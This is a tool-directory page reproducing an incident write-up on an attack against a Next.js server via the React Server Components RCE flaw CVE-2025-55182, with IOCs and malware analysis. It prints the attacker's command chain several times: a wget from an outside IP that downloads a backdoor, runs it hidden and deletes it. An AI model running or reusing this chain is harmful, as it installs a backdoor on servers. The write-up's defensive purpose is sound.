Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-55182-Attack-Analysis — Real-world attack analysis of CVE-2025-55182 (React2Shell) - React Server Components RCE vulnerability | Kitploit
Tools/GitHubGitHub/ngvcanh/cve-2025-55182-attack-analysis
Indicator of Compromise (IOC) ManagementVulnerability AnalysisForensicsWeb SecurityMalware AnalysisThreat IntelligenceLearning & EducationIncident Response

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share
GitHub
ngvcanh/cve-2025-55182-attack-analysis

CVE-2025-55182-Attack-Analysis

Real-world attack analysis of CVE-2025-55182 (React2Shell) - React Server Components RCE vulnerability

View Repository
169 months agoNot yet reviewed

CVE-2025-55182 Attack Analysis: React Server Components RCE

Real-world attack analysis on a production Next.js application

📋 Table of Contents

  • Executive Summary
  • Vulnerability Overview
  • Attack Timeline
  • Technical Analysis
  • Malware Analysis
  • Indicators of Compromise (IOCs)
  • Mitigation & Response
  • Lessons Learned
  • References

Executive Summary

On December 5, 2025, our production Next.js application was targeted by attackers exploiting CVE-2025-55182 (React2Shell), a critical Remote Code Execution vulnerability in React Server Components. The attack attempted to download and execute a Linux backdoor trojan on our server.

AttributeValue
CVE IDCVE-2025-55182
CVSS Score9.8 (Critical)
Attack DateDecember 5, 2025
Attack Outcome✅ Blocked (post-patch)
Malware TypeLinux Backdoor Trojan
Affected StackNext.js + React Server Components

Vulnerability Overview

What is CVE-2025-55182?

CVE-2025-55182, also known as "React2Shell", is a critical Remote Code Execution (RCE) vulnerability affecting React Server Components (RSC) in:

  • React: versions 19.0.0 - 19.2.1
  • Next.js: versions 15.x and 16.x (before patches)

Root Cause

The vulnerability exists in the renderToReadableStream() function within React's Flight Server. When processing specially crafted RSC payloads, the server fails to properly sanitize certain input, leading to arbitrary code execution.

Attack Vector

Attacker → Malicious RSC Payload → Flight Server → eval() → RCE

The attacker sends a crafted POST request with a malicious serialized payload that gets deserialized and executed on the server.


Attack Timeline

Phase 1: Initial Exploitation Attempts (Pre-Patch)

Timestamp (UTC)Event
Dec 5, 06:20First attack detected via Sentry
Dec 5, 06:20Payload attempts to execute shell commands
Dec 5, 06:20Attack partially successful (pre-patch)

Sentry Error Log (Pre-Patch):

Error: root
  at eval (eval at <anonymous>, <anonymous>:3:6)
  at nk (chunk.js)
  at JSON.parse (<anonymous>)
  at n5 (/app/node_modules/next/dist/server/app-render.js)

Phase 2: Patch Deployment

TimestampAction
Dec 4, 14:13Upgraded to Next.js 16.0.7
Dec 4, 14:13Deployed patched version (v1.0.0-beta-4)

Phase 3: Post-Patch Attack Blocked

Timestamp (UTC)Event
Dec 5, 08:48Attack attempt detected
Dec 5, 08:48Payload execution BLOCKED
Dec 5, 08:48Error: syntax error: unexpected ";"

Sentry Error Log (Post-Patch):

Error: Command failed: wget http://45.76.155.14/vim -O /tmp/vim ; 
chmod +x /tmp/vim ; nohup /tmp/vim > /dev/null 2>&1 & ; rm -f /tmp/vim
/bin/sh: syntax error: unexpected ";"

The patch successfully prevented the malicious command from executing.


Technical Analysis

Attack Request Details

AttributeValue
Target URLhttps://[REDACTED]/
MethodPOST
User-AgentPython Requests 2.31
OriginAutomated attack script

Payload Analysis

The attacker attempted to execute the following command chain:

wget http://45.76.155.14/vim -O /tmp/vim ; \
chmod +x /tmp/vim ; \
nohup /tmp/vim > /dev/null 2>&1 & ; \
rm -f /tmp/vim

Breakdown:

StepCommandPurpose
1wget http://45.76.155.14/vim -O /tmp/vimDownload malware
2chmod +x /tmp/vimMake executable
3nohup /tmp/vim > /dev/null 2>&1 &Run in background, persist after logout
4rm -f /tmp/vimDelete evidence

Server Environment

ComponentVersion
OSAlpine Linux 3.23.0
RuntimeNode.js v20.19.6
FrameworkNext.js 16.0.7 (patched)
ContainerDocker

Malware Analysis

File Information

AttributeValue
Filenamevim (disguised as legitimate tool)
SHA2560f0f9c339fcc267ec3d560c7168c56f607232cbeb158cb02a0818720a54e72ce
File TypeELF 64-bit LSB executable, x86-64
LanguageGo (compiled binary)
File Size~4.7 MB

VirusTotal Results

Detection Rate: 13/72 (18%)

VendorDetection Name
DrWebLinux.BackDoor.Siggen.389
AhnLab-V3Backdoor/Linux.Agent.4780032
KasperskyHEUR:Trojan.Linux.Agent.gen
ESET-NOD32Linux/Agent.PX Trojan
Avast/AVGELF:Agent-BQE [Trj]
AliCloudTrojan:Linux/Agent.ff565f70
Antiy-AVLTrojan/Linux.Agent.px
RisingTrojan.Agent/Linux!8.13268
SentinelOneStatic AI - Suspicious ELF
TencentMalware.Linux.Generic.1c03c8b9
ZillyaTrojan.Agent.Linux.5292

VirusTotal Link: View Analysis

Binary Analysis

ELF Header:

00000000: 7f45 4c46 0201 0100 0000 0000 0000 0000  .ELF............
00000010: 0200 3e00 0100 0000 60e7 4500 0000 0000  ..>.....`.E.....

Identified Capabilities:

CapabilityEvidence
HTTP/HTTPS Clientnet/http, *http.Client
TLS Encryptioncrypto/tls, crypto/aes
SOCKS5 Proxysocks, socks5
DNS Resolutionnet/dns/dnsmessage
Strong Cryptochacha20poly1305, Ed25519

Extracted Strings (Relevant):

crypto/aes
crypto/tls
net/http
socks5
vendor/golang.org/x/crypto/chacha20poly1305
vendor/golang.org/x/net/http2/hpack

IDS Rules Triggered

SeverityRuleSource
LOWET POLICY HTTP traffic on port 443 (POST)Proofpoint ET Open
LOWET DNS Query for .cc TLDProofpoint ET Open

Malware Classification

Type: Linux Backdoor Trojan

Capabilities:

  • Remote shell access
  • Command & Control (C2) communication
  • File upload/download
  • Encrypted communications
  • Traffic tunneling via SOCKS5
  • Persistence mechanisms

Indicators of Compromise (IOCs)

Network IOCs

TypeValueDescription
IP Address45.76.155.14Malware distribution server
URLhttp://45.76.155.14/vimMalware download URL
HostingVultr VPSCloud provider
TLD.ccC2 domain uses .cc TLD

File IOCs

TypeValue
SHA2560f0f9c339fcc267ec3d560c7168c56f607232cbeb158cb02a0818720a54e72ce
SHA1[Calculate if needed]
MD5[Calculate if needed]
Filenamevim (disguised)
File TypeELF 64-bit x86-64
File Size~4.7 MB

Behavioral IOCs

IndicatorDescription
wget to external IPDownloads from non-standard URLs
Files in /tmp/Suspicious executable in temp directory
nohup + background executionPersistence attempt
Immediate file deletionEvidence cleanup
Python Requests User-AgentAutomated attack tool

YARA Rule

Download Tool